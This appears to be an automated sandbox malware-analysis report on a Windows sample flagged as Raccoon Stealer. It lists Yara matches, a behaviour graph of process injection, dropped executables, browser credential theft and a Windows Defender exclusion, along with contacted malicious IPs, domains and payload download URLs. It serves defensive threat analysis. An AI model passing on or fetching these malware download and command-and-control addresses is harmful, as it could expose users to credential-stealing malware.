Source: Yara match File source: 0000000E.00000002.482408758.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.559098642.00000000049E1000.00000004.00020000.sdmp, type: MEMORY
Yara detected Raccoon Stealer
Source: Yara match File source: 29.3.E4D7.exe.48e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.E4D7.exe.48e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.E4D7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.E4D7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001D.00000002.649599129.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.553896826.00000000048E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: E4D7.exe PID: 6552, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 511828 Sample: y8WngeDn4q.exe Startdate: 29/10/2021 Architecture: WINDOWS Score: 100 85 mas.to 2->85 87 hajezey1.top 2->87 89 2 other IPs or domains 2->89 105 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->105 107 Multi AV Scanner detection for domain / URL 2->107 109 Found malware configuration 2->109 111 17 other signatures 2->111 11 y8WngeDn4q.exe 2->11         started        14 esdfufc 2->14         started        16 csdfufc 2->16         started        signatures3 process4 signatures5 121 Contains functionality to inject code into remote processes 11->121 123 Injects a PE file into a foreign processes 11->123 18 y8WngeDn4q.exe 11->18         started        125 Machine Learning detection for dropped file 14->125 21 esdfufc 14->21         started        process6 signatures7 97 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 18->97 99 Maps a DLL or memory area into another process 18->99 101 Checks if the current machine is a virtual machine (disk enumeration) 18->101 23 explorer.exe 14 18->23 injected 103 Creates a thread in another existing process (thread injection) 21->103 process8 dnsIp9 91 sysaheu90.top 185.98.87.159, 49758, 49760, 49761 VM-HOSTINGRU Russian Federation 23->91 93 216.128.137.31, 80 AS-CHOOPAUS United States 23->93 95 7 other IPs or domains 23->95 61 C:\Users\user\AppData\Roaming\gbdfufc, PE32 23->61 dropped 63 C:\Users\user\AppData\Roaming\esdfufc, PE32 23->63 dropped 65 C:\Users\user\AppData\Roaming\csdfufc, PE32 23->65 dropped 67 16 other malicious files 23->67 dropped 113 System process connects to network (likely due to code injection or exploit) 23->113 115 Benign windows process drops PE files 23->115 117 Deletes itself after installation 23->117 119 Hides that the sample has been downloaded from the Internet (zone.identifier) 23->119 28 4EDC.exe 1 23->28         started        32 37D8.exe 21 6 23->32         started        35 6E1E.exe 23->35         started        37 7 other processes 23->37 file10 signatures11 process12 dnsIp13 69 C:\Users\user\AppData\Local\Temp\1105.tmp, PE32 28->69 dropped 127 Multi AV Scanner detection for dropped file 28->127 129 DLL reload attack detected 28->129 131 Detected unpacking (changes PE section rights) 28->131 147 2 other signatures 28->147 77 cdn.discordapp.com 162.159.135.233, 443, 49799, 49805 CLOUDFLARENETUS United States 32->77 71 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 32->71 dropped 133 Machine Learning detection for dropped file 32->133 135 Writes to foreign memory regions 32->135 137 Allocates memory in foreign processes 32->137 149 2 other signatures 32->149 39 AdvancedRun.exe 32->39         started        41 powershell.exe 32->41         started        43 DataSvcUtil.exe 32->43         started        45 SMSvcHost.exe 32->45         started        139 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 35->139 151 2 other signatures 35->151 79 194.180.174.181, 49859, 80 MIVOCLOUDMD unknown 37->79 81 93.115.20.139, 28978, 49854 MVPShttpswwwmvpsnetEU Romania 37->81 83 3 other IPs or domains 37->83 73 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 37->73 dropped 75 C:\Users\user\AppData\LocalLow\sqlite3.dll, PE32 37->75 dropped 141 Detected unpacking (overwrites its own PE header) 37->141 143 Tries to harvest and steal browser information (history, passwords, etc) 37->143 145 Adds a directory exclusion to Windows Defender 37->145 47 AdvancedRun.exe 37->47         started        49 powershell.exe 37->49         started        51 8908.exe 37->51         started        file14 signatures15 process16 process17 53 AdvancedRun.exe 39->53         started        55 conhost.exe 41->55         started        57 AdvancedRun.exe 47->57         started        59 conhost.exe 49->59         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.98.87.159
 privacytoolzforyou-6000.top Russian Federation
205840 VM-HOSTINGRU true
81.177.141.36
 iyc.jelikob.ru Russian Federation
8342 RTCOMM-ASRU false
45.141.84.21
 nusurtal4f.net Russian Federation
206728 MEDIALAND-ASRU false
104.21.9.146
 toptelete.top United States
13335 CLOUDFLARENETUS false
194.180.174.181
 unknown unknown
39798 MIVOCLOUDMD true
216.128.137.31
 unknown United States
20473 AS-CHOOPAUS true
162.159.135.233
 cdn.discordapp.com United States
13335 CLOUDFLARENETUS false
93.115.20.139
 unknown Romania
202448 MVPShttpswwwmvpsnetEU false
5.163.179.4
 znpst.top Saudi Arabia
25019 SAUDINETSTC-ASSA false
162.159.134.233
 unknown United States
13335 CLOUDFLARENETUS false

Private
IP
192.168.2.1

Contacted Domains

Name IP Active
privacytoolzforyou-6000.top 185.98.87.159 true
iyc.jelikob.ru 81.177.141.36 true
toptelete.top 104.21.9.146 true
mas.to 88.99.75.82 true
cdn.discordapp.com 162.159.135.233 true
api.2ip.ua 77.123.139.190 true
znpst.top 5.163.179.4 true
nusurtal4f.net 45.141.84.21 true
hajezey1.top 185.98.87.159 true
sysaheu90.top 185.98.87.159 true
telegalive.top unknown unknown
xacokuo8.top unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://sysaheu90.top/game.exe true
  • 16%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
https://cdn.discordapp.com/attachments/893177342426509335/903333369742491648/1E88D378.jpg false
    		high
    https://cdn.discordapp.com/attachments/893177342426509335/902526114763767818/A623D0D3.jpg false
      		high
      http://nusurtal4f.net/ false
      • Avira URL Cloud: safe
      		 unknown
      http://znpst.top/dl/buildz.exe true
      • Avira URL Cloud: malware
      		 unknown
      http://privacytoolzforyou-6000.top/downloads/toolspab2.exe true
      • Avira URL Cloud: malware
      		 unknown
      https://cdn.discordapp.com/attachments/893177342426509335/903575519373697084/F83CB811.jpg false
        		high
        https://iyc.jelikob.ru/263873486.exe false
        • Avira URL Cloud: safe
        		 unknown
        https://193.56.146.214/ true
        • Avira URL Cloud: safe
        		 unknown
        https://cdn.discordapp.com/attachments/893177342426509335/902526117016109056/AB0F9338.jpg false
          		high
          http://194.180.174.181//l/f/UJ1rynwB3dP17Spz23JR/c8a165d96af5f02e4cac679a1908533dbdcac0e8 true
          • Avira URL Cloud: safe
          		 unknown
          http://194.180.174.181/ true
          • Avira URL Cloud: safe
          		 unknown
          http://toptelete.top/agrybirdsgamerept true
          • Avira URL Cloud: malware
          		 unknown
          https://cdn.discordapp.com/attachments/893177342426509335/903575517888925756/6D9E3C88.jpg false
            		high
            http://193.56.146.214/ true
            • Avira URL Cloud: safe
            		 unknown
            http://hajezey1.top/ true
            • Avira URL Cloud: malware
            		 unknown